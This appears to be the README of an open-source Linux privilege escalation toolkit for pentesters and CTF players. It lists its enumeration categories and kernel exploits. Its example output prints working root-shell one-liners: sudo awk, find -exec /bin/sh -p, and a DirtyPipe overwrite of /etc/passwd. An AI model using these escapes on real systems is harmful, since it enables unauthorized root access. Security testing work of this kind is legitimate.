Share
## https://sploitus.com/exploit?id=D0A0DF53-AA3B-5A5C-B03B-5D3F30790643
# ๐Ÿง Linux Privilege Escalation Toolkit

> Automated enumeration + exploit suggestion + 50+ privesc techniques. For pentesters, CTF players, and red teams.


  
  
  
  
  


---

## ๐Ÿ’ก What is Linux-Privesc?

A comprehensive toolkit for finding and exploiting Linux privilege escalation vectors:

- ๐Ÿ” **Auto-enumeration** โ€” 200+ checks in one command
- ๐ŸŽฏ **Smart matching** โ€” suggests exploits based on kernel, SUID, capabilities
- ๐Ÿ“š **Living documentation** โ€” each technique has explanation + fix
- ๐Ÿ› ๏ธ **Exploit compiler** โ€” auto-compiles kernel exploits for your target

---

## ๐Ÿš€ Quick Start

```bash
git clone https://github.com/javokhir-sec/linux-privesc.git
cd linux-privesc
chmod +x privesc.sh

# Full enumeration
./privesc.sh full

# Quick check (top 20 most common)
./privesc.sh quick

# Specific category
./privesc.sh suid
./privesc.sh capabilities
./privesc.sh cron
./privesc.sh sudo
```

---

## ๐Ÿ“‹ Covers

| Category | Checks | Examples |
|----------|--------|----------|
| ๐Ÿ”‘ SUID/SGID | 30+ | find, vim, bash, python, pkexec |
| โšก Sudo | 20+ | LD_PRELOAD, env_keep, NOPASSWD |
| ๐Ÿ• Cron Jobs | 15+ | Writable scripts, PATH hijack |
| ๐Ÿ”ง Capabilities | 10+ | cap_sys_ptrace, cap_dac_read_search |
| ๐Ÿ“‚ File Permissions | 25+ | Shadow readable, SSH keys, configs |
| ๐Ÿง Kernel Exploits | 40+ | DirtyCow, DirtyPipe, PwnKit, GameOver(lay) |
| ๐Ÿ”— NFS/Shares | 5+ | no_root_squash, mounted shares |
| ๐Ÿณ Docker/LXC | 10+ | Privileged containers, socket exposure |
| ๐Ÿ“ Writable Files | 20+ | /etc/passwd, /etc/sudoers, services |
| ๐Ÿ” Credential Hunting | 15+ | History files, config files, logs |

---

## โšก Example Output

```
๐Ÿง Linux-Privesc v1.0 โ€” Starting enumeration...
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”

[+] OS: Ubuntu 20.04.6 LTS | Kernel: 5.4.0-150-generic
[+] User: www-data (uid=33)

๐Ÿ”‘ SUID Binaries:
   โš ๏ธ  /usr/bin/find โ€” GTFOBins: privesc via -exec
   โš ๏ธ  /usr/bin/python3.8 โ€” GTFOBins: capability abuse

โšก Sudo Rights:
   โš ๏ธ  (ALL) NOPASSWD: /usr/bin/awk โ€” GTFOBins: shell escape

๐Ÿง Kernel Exploits:
   ๐Ÿ’€ CVE-2022-0847 (DirtyPipe) โ€” Kernel 5.4.0 MATCH!
   ๐Ÿ’€ CVE-2021-4034 (PwnKit) โ€” pkexec found!

๐ŸŽฏ Quick Wins (3 found):
   1. sudo awk 'BEGIN {system("/bin/sh")}'
   2. find . -exec /bin/sh -p \; -quit
   3. ./DirtyPipe-exploit /etc/passwd 1 ootz

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โœ… Enumeration complete. 3 quick wins found!
```

---

## ๐Ÿ“œ License

MIT ยฉ [Javokhir Tursunboyev](https://github.com/javokhir-sec)